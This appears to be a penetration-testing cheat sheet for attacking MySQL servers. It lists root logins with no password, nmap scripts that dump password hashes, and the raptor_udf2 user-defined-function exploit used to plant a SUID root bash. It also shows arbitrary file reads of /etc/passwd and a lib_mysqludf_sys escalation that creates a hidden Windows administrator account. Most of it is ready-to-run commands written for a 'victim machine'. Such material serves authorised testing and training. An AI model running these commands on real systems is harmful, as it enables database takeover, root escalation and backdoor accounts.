Local Access
mysql:mysql -u root (connecting to root without password)
mysql -u -p (Using password)
Remote access
mysql:mysql -h -u root (connecting to root without password)
mysql -h root@localhost
nmap scripts
nmap:nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
Mysql commands
show databases;
show tables;
use ;
show tables;
describe ;
SELECT FROM ; (use * to select all columns)
SELECT * from ;
Mysql privilege escalation to root via user defined functions:-
User defined functions in mysql and then run bash commands using those functions as root.
Use exploit 1518.c and transfer it over to the victim and rename it to raptor_udf2.c (so that mysql can recognise this function)
Check which directory is writable (if /tmp doesn’t give results try a known more malicious directory like /var/www, /var/www/html/, etc)
Now compiling the exploit on victim machine (as when we compiled on attacker machine it didn’t work)
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl, -soname, raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lcNow, login to mysql as root and run following queries:
> show databases;
> use mysql;
> create table foo(line blob);
> insert into foo values(load_file('/var/www/raptor_udf2.so'));
> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
> create function do_system returns integer soname 'raptor_udf2.so';
> select * from mysql.func; # to check if function has been loaded.
> select do_system('cp /bin/bash /var/www/rootbash; chmod +xs /var/www/rootbash');Hence, we have copied the bash binary to a location and now we can execute it as we have set suid and execute privileges as root user!
Mysql arbitrary file read
Actually, when you try to load data local into a table the content of a file the MySQL or MariaDB server asks the client to read it and send the content. Then, if you can tamper a mysql client to connect to your own MyQSL server, you can read arbitrary files.
Please notice that this is the behaviour using:
mysql:load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
Without the local keyword you can get the error:
mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
Mysql privilege escalation to root via library
You can find compiled versions of this libraries in sqlmap: locate lib_mysqludf_sys.so and locate lib_mysqludf_sys.dll
Instead of locate you can also use whereis to search for this libraries inside the host.
Linux:use mysql;
create table npn(line blob);
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
select * from npn into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
select sys_exec('id > /tmp/out.txt');
Windows:USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_files('C://temp//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
Useful mysql files
windows
- config.ini
- my.ini
- windows\my.ini
- winnt\my.ini
- /mysql/data/
unix - my.cnf
- /etc/my.cnf
- /etc/mysql/my.cnf
- /var/lib/mysql/my.cnf
- ~/.my.cnf
- /etc/my.cnf
Command History
- ~/.mysql.history
Log Files - connections.log
- update.log
- common.log
For more info, check hacktricks.